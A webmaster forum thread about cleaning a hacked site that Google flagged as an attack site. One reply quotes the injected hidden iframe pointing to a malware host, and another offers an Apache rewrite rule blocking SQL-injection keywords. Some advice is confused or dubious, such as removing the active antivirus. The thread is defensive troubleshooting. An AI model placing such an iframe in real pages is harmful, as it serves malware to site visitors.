My website has been reported by google as an "Attack Site" ! Help Please !

Just notice this morning (Romania hour +2h GMT) a message in my google webmaster's account telling me that my site had just been reported as an "Attack site", i know nothing about it.
What should i do ?
Where and what should I look for ?



Any help is appreciated.
Have a good day,

 

chech backend......and see whats wrong........then submit to google for review.....happened to me couple times.......dont worry everyday u learn something new............once u fix backend....or update ur website ...then submit to google from webmaster account........it will take about a week the max from the day u submit for google to list ur site safe

dont stress too much........fix it..........

 

I ignored the warning and visited your website.
McAfee antivirus gave this warning

 

Check your webserver's apache and system security logs, also check rootkit.

Then you can easily examine your problem.

----------------
Techbabu
Don't just make a website: Make an impact

 

Strip the codes from your files. Once complete, scan your computer for trojans/malware, finally change your ftp passwords and upload your clean files.

 

Hi,
maineexista,
I've suffered the same couple of weeks ago with the same problem. and now my all sites are doing well and Google remove it from his DB to explain my visitors that it's an attack site. i keep changing the code for many times but nothing work out.
reasons; your PC contained some virus that is attacking to your website only when you run your ftp.
See, how i accomplished this job in steps.
1. remove the active antivirus from you PC and restart it.
2. download another antivirus from this link...http://download.cnet.com/Avast-Professional-Edition/3000-2239_4-10181058.html?tag=mncol
3. install and scan all drive, don't miss out any single drive.
4. add this java enabled injection so no further attack may proceed.
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]
5.check with CONTROL+F to locate the iframe and remove it from the script.
6. use the google webmaster tool to inform the google for reconsideration of your site.
7. here you are done.
thanks.

 

<iframe src="http://dakilfu.net/?click=C03E7A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

HTML:

This is your iframe.
Little bit more info: http://google.com/safebrowsing/diagnostic?site=dakilfu.net/&hl=ru-ru
http://www.virustotal.com/analisis/...804e6369348834f03cec666b9944a40bfa-1257189288
Because of this code inserted after tags </body></html> you must check your index.php file and also all included files (look for functions like require, include), also check these files for something with base64 inside and post code here.

Check which version of PHP Link Directory you are using and which version is current. Update it if needed.

Change your admin password. Use minimum 9 characters. Make something like asRT@76kf or, if you can not remember passwords, make it something like "5 Red @ppels". Do not use same passwords for cp, ftp, admin etc.

If you have removed iframe or uploaded new site change file permissions with your ftp client or cpanel. Permissions must be 644 or -rw-r--r--

 

1.Go to the source code of your site. Pay attention to your before or after <body> or </body>, you may find iframe link - remove it and upload.
2.Go to webmaster tool and tell google to reconsider your site
3.Install antivirus software, enable daily and online scaning
4.Enjoy!

 

thanks everyone for beeing so nice and offers so many infos on that issue.

i did checked a few things of what you guys said and it isn't ready yet but i will do it as soon as i will have some spare time.

Thanks again, for all these precios informations on this topic

I will post the entire working solution here when it's done

 

this morning i've observed that google removed my site from their blacklist and i am pretty surprised to see i have over +3000,00% visitors / day
i hope it will grow even more.r help.

Thanks again for you,

Have a great day